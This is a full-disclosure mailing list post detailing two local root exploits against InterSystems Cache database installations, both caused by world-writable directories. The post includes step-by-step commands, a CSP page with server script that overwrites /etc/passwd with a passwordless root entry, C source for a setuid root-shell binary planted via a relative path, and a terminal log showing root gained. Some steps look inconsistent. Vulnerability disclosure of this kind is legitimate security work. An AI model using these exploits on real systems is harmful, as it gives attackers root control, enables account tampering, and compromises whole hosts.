Here are more details of my research...
Vuln1 Local attackers can exploit this to manipulate directories and binaries inside the installation tree. This may be used by a local malicious user to gain root access. The content in /cachesys/csp/user is executed as root through the web interface. user's parent directory (csp) is world writeable allowing a local non root user to move user aside, copy its contents and create a new writeable user directory. 1. mv /cachesys/csp/user /cachesys/csp/user.old 2. cp -rp /cachesys/csp/user /cachesys/csp/user.old 3. cp cspexp.csp /cachesys/csp/user 4. lnyx http://localhost/csp/user/cspexp.csp 5. su - cache <------------------cspexp.csp-------------> <html> Intersystems Cache' local root exploit. Larry W. Cashdollar http://vapid.dhs.org Because of poor default file and directory permissions a localuser can execute code as root via the cache CSP interpreter. <HR> Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash. <script language=Cache runat=server> Set cdef=##class(%Library.File).%New("/etc/passwd") Do cdef.Open("WSN") Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash") Do cdef.%Close() </script> </html> Vuln 2 --------- A user who is a member of the group configured at installation to start and stop the cache database can get local root access by exploting poor file permissions and the use of relative path names in setuid binaries. Using the following method. 1. mv /path/to/cache/bin/cache /path/to/cache/bin/cache.orig 2. cd /path/to/cache/bin 3. cat cache.c << -EOF- #include <stdio.h> int main(void) { setuid(0);setgid(0); system("/bin/sh"); } -EOF- 4. gcc cache.c -o cache 5. ./cuxs Details: cuxs is setuid root and can be configured as executeable by a specific group upon installation of Cache' database. cuxs is a control program for Cache, it executes Cache using the following system call: execve("../bin/cache",["cache"],... since by default bin is world write able the binary cache can be moved and replaced by a malicous one. [EMAIL PROTECTED] lwc]$ cd /usr/ecache [EMAIL PROTECTED] ecache]$ ls -ld bin;cd bin drwxrwxrwx 2 root root 4096 Mar 18 07:13 bin [EMAIL PROTECTED] bin]$ mv cache cache.orig [EMAIL PROTECTED] bin]$ gcc cache.c -o cache [EMAIL PROTECTED] bin]$ id uid=500(lwc) gid=500(lwc) groups=500(lwc),10(wheel) [EMAIL PROTECTED] bin]$ ls -l cuxs -rwsr-x--- 1 root wheel 16488 Mar 18 06:49 cuxs [EMAIL PROTECTED] bin]$ ./cuxs sh-2.05a# id uid=0(root) gid=0(root) groups=500(lwc),10(wheel) sh-2.05a# _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
